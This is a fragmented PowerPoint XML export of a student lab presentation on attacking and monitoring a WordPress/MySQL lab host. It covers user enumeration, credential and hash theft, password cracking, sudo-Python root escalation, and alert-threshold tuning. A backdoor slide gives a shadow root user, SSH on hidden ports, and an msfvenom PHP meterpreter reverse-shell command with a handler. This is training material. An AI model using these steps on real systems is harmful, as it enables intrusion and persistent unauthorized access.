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24377650" cy="13716000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Amatic SC" panose="020B0604020202020204" charset="-79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Helvetica Neue" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId40"/>
      <p:bold r:id="rId41"/>
      <p:italic r:id="rId42"/>
      <p:boldItalic r:id="rId43"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Inconsolata" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId44"/>
      <p:bold r:id="rId45"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Lato Light" panose="020F0302020204030203" charset="0"/>
      <p:regular r:id="rId46"/>
      <p:bold r:id="rId47"/>
      <p:italic r:id="rId48"/>
      <p:boldItalic r:id="rId49"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Poppins" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId50"/>
      <p:bold r:id="rId51"/>
      <p:italic r:id="rId52"/>
      <p:boldItalic r:id="rId53"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Poppins Medium" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId54"/>
      <p:bold r:id="rId55"/>
      <p:italic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  <p:embeddedFont>
      <p:font typeface="Roboto Black" panose="020B0604020202020204" charset="0"/>
      <p:bold r:id="rId62"/>
      <p:boldItalic r:id="rId63"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId64"/>
      <p:bold r:id="rId65"/>
      <p:italic r:id="rId66"/>
      <p:boldItalic r:id="rId67"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId68"/>
      <p:bold r:id="rId69"/>
      <p:italic r:id="rId70"/>
      <p:boldItalic r:id="rId71"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin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EBA549-C3E2-439E-8461-220702F2DDF6}">
  <a:tblStyle styleId="{53EBA549-C3E2-439E-8461-220702F2DD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font" Target="fonts/font3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font" Target="fonts/font33.fntdata"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font41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2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font" Target="fonts/font36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72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font3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font" Target="fonts/font34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70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font37.fntdata"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font4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73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font40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3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ded5aea9c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ded5aea9c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gded5aea9c3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ded5aea9c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ded5aea9c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gded5aea9c3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ded5aea9c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ded5aea9c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gded5aea9c3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dbe25b302c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dbe25b302c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gdbe25b302c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dbe25b302c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dbe25b302c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gdbe25b302c_2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dbe25b302c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dbe25b302c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gdbe25b302c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dbe25b302c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dbe25b302c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gdbe25b302c_2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dbe25b302c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dbe25b302c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gdbe25b302c_2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dbe25b302c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" name="Google Shape;2518;gdbe25b302c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gdbe25b302c_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dbe25b302c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dbe25b302c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gdbe25b302c_2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dbe25b302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dbe25b302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gdbe25b302c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dbe25b302c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dbe25b302c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gdbe25b302c_2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8bd883d690_5_5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8bd883d690_5_5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8bd883d6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8bd883d6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ed5aea9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ed5aea9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gded5aea9c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806852" y="2386942"/>
            <a:ext cx="22914900" cy="2112900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="57150" dist="19050" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="45E4FC">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6321300" y="6695050"/>
            <a:ext cx="11546400" cy="577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45E4F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GROUP 3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Brad Lawler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Tyler Medina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Natalie Tiona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James Rimensnyder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Adrell Gibson</a:t>
            </a:r>
            <a:endParaRPr sz="3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Exploitation: MySQL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2407" name="Google Shape;2407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08" name="Google Shape;2408;p145"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-99483" y="1703242"/>
            <a:ext cx="24377700" cy="96591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MySQL Credentials</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2409" name="Google Shape;2409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825" y="3564500"/>
            <a:ext cx="11130999" cy="49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Google Shape;2410;p145"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1110600" y="8685725"/>
            <a:ext cx="6064200" cy="754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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3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 dump</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2411" name="Google Shape;2411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850" y="9826250"/>
            <a:ext cx="19540526" cy="12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Exploitation: MySQL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2418" name="Google Shape;2418;p1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19" name="Google Shape;2419;p1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 mom</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2420" name="Google Shape;2420;p146"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-33" y="2202992"/>
            <a:ext cx="24377700" cy="96591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Gained Password hashes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2421" name="Google Shape;2421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50" y="3226250"/>
            <a:ext cx="18662924" cy="51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146"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="918725" y="8470875"/>
            <a:ext cx="10865100" cy="754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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3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Flags were also located in the dump</a:t>
            </a:r>
            <a:endParaRPr sz="3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3" name="Google Shape;2423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50" y="9225079"/>
            <a:ext cx="23051327" cy="12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[John the Ripper]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2429" name="Google Shape;2429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30" name="Google Shape;2430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53619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Tools Used:</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="13716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John the Ripper</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="13716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Rockyou Wordlist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Results:</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="13716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 Additional users credentials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31" name="Google Shape;2431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00" y="7930175"/>
            <a:ext cx="23089075" cy="20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3625" y="10275150"/>
            <a:ext cx="18331601" cy="25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Exploitation: [Root Escalation Via Python]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2439" name="Google Shape;2439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0" name="Google Shape;2440;p148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13716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Tools Used:</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="18288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Python</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="13716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Results </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="18288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Gained root access</a:t>
            </a:r>
            <a:endParaRPr sz="44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2441" name="Google Shape;244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925" y="8291425"/>
            <a:ext cx="16549250" cy="42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Google Shape;2446;p14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14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14</a:t>
            </a:fld>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2448" name="Google Shape;2448;p149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9" name="Google Shape;2449;p149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Exploits - WP Scan - MYSQL - Python Script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5" name="Google Shape;2455;p1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56" name="Google Shape;2456;p15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Alert Thresholds - Ineffective</a:t>
            </a:r>
            <a:endParaRPr sz="4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Excessive HTTP Errors - Above 400 for the last 5 Minutes</a:t>
            </a:r>
            <a:endParaRPr sz="44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HTTP Requests Size Monitor - Above 3,500 for above the last one minute</a:t>
            </a:r>
            <a:endParaRPr sz="4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CPU Usage Monitor - Above 0.5 for the last 5 minutes</a:t>
            </a:r>
            <a:endParaRPr sz="4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463" name="Google Shape;2463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025" y="3699325"/>
            <a:ext cx="22337600" cy="3054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4" name="Google Shape;2464;p151"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1245200" y="2848825"/>
            <a:ext cx="1622400" cy="5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Target 1</a:t>
            </a:r>
            <a:endParaRPr sz="2300" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2465" name="Google Shape;2465;p151"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1020025" y="509400"/>
            <a:ext cx="17940900" cy="86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WP Scan Exploit - Target 1 - Which alerts detect this exploit?</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2466" name="Google Shape;2466;p151"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533200" y="1894425"/>
            <a:ext cx="15465600" cy="86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Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="44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CPU Usage Monitor - Above 0.5 for the last 5 minutes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467" name="Google Shape;2467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0825" y="9594050"/>
            <a:ext cx="21033775" cy="34133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8" name="Google Shape;2468;p151"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533200" y="7065950"/>
            <a:ext cx="20923200" cy="2216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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4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 Requests Size Monitor - Above 3,500 for above the last one minute - Did not trip an alert because highest spike in 1 min was 2140</a:t>
            </a:r>
            <a:endParaRPr sz="4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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4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Recommended threshold of 1,000 HTTP Requests in last minute</a:t>
            </a:r>
            <a:endParaRPr sz="4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75" name="Google Shape;2475;p152"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264125" y="331050"/>
            <a:ext cx="18055200" cy="86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 1 - Excessive HTTP Errors - Above 400 for the last 5 Minutes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2476" name="Google Shape;2476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0" y="4646975"/>
            <a:ext cx="20974626" cy="41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Google Shape;2477;p152"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="963650" y="2565825"/>
            <a:ext cx="20017500" cy="153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Failed to trip - Set threshold too high - suggested threshold of 25 HTTP errors in 1 Minute</a:t>
            </a:r>
            <a:endParaRPr sz="4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5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Stealth Exploitation of [MySQL] </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2484" name="Google Shape;2484;p1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485" name="Google Shape;2485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200" y="8744850"/>
            <a:ext cx="20548476" cy="40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6" name="Google Shape;2486;p153"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623600" y="1906450"/>
            <a:ext cx="23130300" cy="135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"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3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CPU Usage Monitor - Above 0.5 for the last 5 minutes - MYSQL Dump caused CPU usage of 0.2 - Would not have triggered alert - If threshold set to 0.2 it would cause too many false positives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487" name="Google Shape;2487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0025" y="3699325"/>
            <a:ext cx="22337600" cy="3054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8" name="Google Shape;2488;p153"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623600" y="7056850"/>
            <a:ext cx="19319400" cy="1385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76250" algn="l" rtl="0"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en-US" sz="3900"/>
              <a:t>No other alerts would have been tripped</a:t>
            </a:r>
            <a:endParaRPr sz="3900"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-476250" algn="l" rtl="0"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en-US" sz="3900"/>
              <a:t>Recommend new alert that trips when more than 2,000 files request in last minute </a:t>
            </a:r>
            <a:endParaRPr sz="3900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2489" name="Google Shape;2489;p153"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17677975" y="3929000"/>
            <a:ext cx="111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WP SCAN</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2490" name="Google Shape;2490;p153"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19509500" y="5175675"/>
            <a:ext cx="16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 DUMP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5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Mitigating Detection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2496" name="Google Shape;2496;p1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497" name="Google Shape;2497;p154"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717350" y="2163325"/>
            <a:ext cx="22942800" cy="9866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How can you execute the same exploit without triggering the alert? No alert was triggered.  </a:t>
            </a:r>
            <a:endParaRPr sz="400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Are there alternative exploits that may perform better? Using a command mysqldump on the command line is an alternative to logging into the server direction.</a:t>
            </a:r>
            <a:endParaRPr sz="7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98" name="Google Shape;2498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575" y="7816700"/>
            <a:ext cx="21660400" cy="14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effectLst>
            <a:outerShdw blurRad="57150" dist="19050" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="45E4FC">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst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effectLst>
            <a:outerShdw blurRad="57150" dist="19050" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="45E4FC">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst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effectLst>
            <a:outerShdw blurRad="57150" dist="19050" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="45E4FC">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst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Avoiding Detect</a:t>
            </a:r>
            <a:endParaRPr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effectLst>
            <a:outerShdw blurRad="57150" dist="19050" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="45E4FC">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst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Maintaining Access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5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/>
              <a:t>Target -1 - Python Script Elevation of Privileges - Sudo Commands</a:t>
            </a:r>
            <a:endParaRPr sz="5900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2505" name="Google Shape;2505;p1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506" name="Google Shape;2506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425" y="2342975"/>
            <a:ext cx="19892050" cy="102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513" name="Google Shape;2513;p15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Target -1 - Python Script Elevation of Privileges - Sudo Commands</a:t>
            </a:r>
            <a:endParaRPr sz="5600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2514" name="Google Shape;2514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625" y="3206250"/>
            <a:ext cx="22404249" cy="8951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5" name="Google Shape;2515;p156"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113125" y="2113050"/>
            <a:ext cx="201069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Recommend setting an alert for any sudo/privilege activity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522" name="Google Shape;2522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75" y="3887975"/>
            <a:ext cx="22956199" cy="5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3" name="Google Shape;2523;p157"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="962200" y="490525"/>
            <a:ext cx="10395600" cy="86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Syslog Events - Target 1</a:t>
            </a:r>
            <a:endParaRPr sz="4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530" name="Google Shape;2530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700" y="3113000"/>
            <a:ext cx="18481475" cy="8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58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="962200" y="490525"/>
            <a:ext cx="10395600" cy="86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SSH Logins - Target 1</a:t>
            </a:r>
            <a:endParaRPr sz="4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538" name="Google Shape;2538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625" y="2303200"/>
            <a:ext cx="21422200" cy="10501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39" name="Google Shape;2539;p159"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="962200" y="490525"/>
            <a:ext cx="10395600" cy="86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Sudo Commands</a:t>
            </a:r>
            <a:endParaRPr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546" name="Google Shape;2546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050" y="5133200"/>
            <a:ext cx="19148099" cy="53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7" name="Google Shape;2547;p160"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="962200" y="490525"/>
            <a:ext cx="10395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Raven Syslog Data</a:t>
            </a:r>
            <a:endParaRPr sz="4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16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[Hash Cracking]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2553" name="Google Shape;2553;p16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554" name="Google Shape;2554;p16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None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None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None, there is no way to detect if John the Ripper is working on a existing hash.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 No alert was triggered.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 Using specific word lists may make the program work faster.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6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16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27</a:t>
            </a:fld>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2561" name="Google Shape;2561;p16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Maintaining Access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2" name="Google Shape;2562;p16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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32716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Backdooring the Target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8" name="Google Shape;2568;p16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569" name="Google Shape;2569;p16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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Backdoor Overview</a:t>
            </a:r>
            <a:endParaRPr sz="3900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill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Backdoors for persistence: </a:t>
            </a:r>
            <a:endParaRPr sz="3900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-476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Creation of shadow user with root access for reentry</a:t>
            </a:r>
            <a:endParaRPr sz="3900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-476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Open obscure unused ports and permit SSH on said ports</a:t>
            </a:r>
            <a:endParaRPr sz="3900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-476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Create a malicious drop using MSFVenom to create reverse shell</a:t>
            </a:r>
            <a:endParaRPr sz="3900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill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Implementation:</a:t>
            </a:r>
            <a:endParaRPr sz="3900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-476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Root access provided ability to change SSH configs and produce new users at the root level</a:t>
            </a:r>
            <a:endParaRPr sz="3900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-476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Malicious MSFVenom drop though phishing and metasploit</a:t>
            </a:r>
            <a:endParaRPr sz="3900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill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Connection Method</a:t>
            </a:r>
            <a:endParaRPr sz="3900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-476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ssh &lt;username&gt;@192.168.1.110 -p 8765</a:t>
            </a:r>
            <a:endParaRPr sz="3900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-476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msfvenom -p /php/meterpreter/reverse_tcp lhost=192.168.90 lport=4444 &gt; innocent.php</a:t>
            </a:r>
            <a:endParaRPr sz="3900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-4762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msfconsole -&gt; exploit/multi/handler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pic>
        <p:nvPicPr>
          <p:cNvPr id="2354" name="Google Shape;2354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738" y="2257188"/>
            <a:ext cx="15677519" cy="104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139"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7603225" y="4622300"/>
            <a:ext cx="2169600" cy="92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139"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7867350" y="4815200"/>
            <a:ext cx="186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/>
              <a:t>TARGET 1</a:t>
            </a:r>
            <a:endParaRPr sz="31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3" name="Google Shape;2363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4" name="Google Shape;2364;p140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{53EBA549-C3E2-439E-8461-220702F2DDF6}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usernames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Unencrypted Server Credentials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listed in config file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Escalated permission to root access via Sudo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Engineering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Poor password health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9" name="Google Shape;2369;p14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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2371" name="Google Shape;2371;p141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2" name="Google Shape;2372;p141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[Wordpress Scan]</a:t>
            </a:r>
            <a:endParaRPr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79" name="Google Shape;2379;p142"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717350" y="1959750"/>
            <a:ext cx="22942800" cy="689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Summarize the following:</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0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Tools used: </a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1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Nmap to determine the SQL server on the Network  </a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="13716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WP Scan to enumerate vulnerabilities and usernames</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="9144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Results: </a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1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Allowed us to determine an entry point via username and guessing common passwords  </a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1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Access to log-in information opens new avenues to exploits</a:t>
            </a:r>
            <a:endParaRPr sz="4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80" name="Google Shape;2380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450" y="7994825"/>
            <a:ext cx="13281225" cy="4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 Scan Continued</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2387" name="Google Shape;2387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8" name="Google Shape;2388;p143"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="370500"/>
            <a:ext cx="13593600" cy="30288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6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4572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wpscan used to enumerate users</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2389" name="Google Shape;2389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74" y="2889075"/>
            <a:ext cx="21590575" cy="10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14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75" y="4069438"/>
            <a:ext cx="16037525" cy="24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p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550" y="7565250"/>
            <a:ext cx="9889951" cy="53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43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1221575" y="6811050"/>
            <a:ext cx="9743400" cy="754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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3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Poor password health leads to SSH entry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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270134" y="50400"/>
            <a:ext cx="24443100" cy="1423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MySQL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2398" name="Google Shape;2398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9" name="Google Shape;2399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61698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Tools Used:</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="13716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Local user access to wp-config.php</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="13716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Mysql remote connection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Results:</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="13716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 Open access to database credentials</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="13716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 Gained user password hashes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00" name="Google Shape;2400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125" y="8584314"/>
            <a:ext cx="21862951" cy="381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858</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>205</Paragraphs>
  <Slides>28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Poppins Medium</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
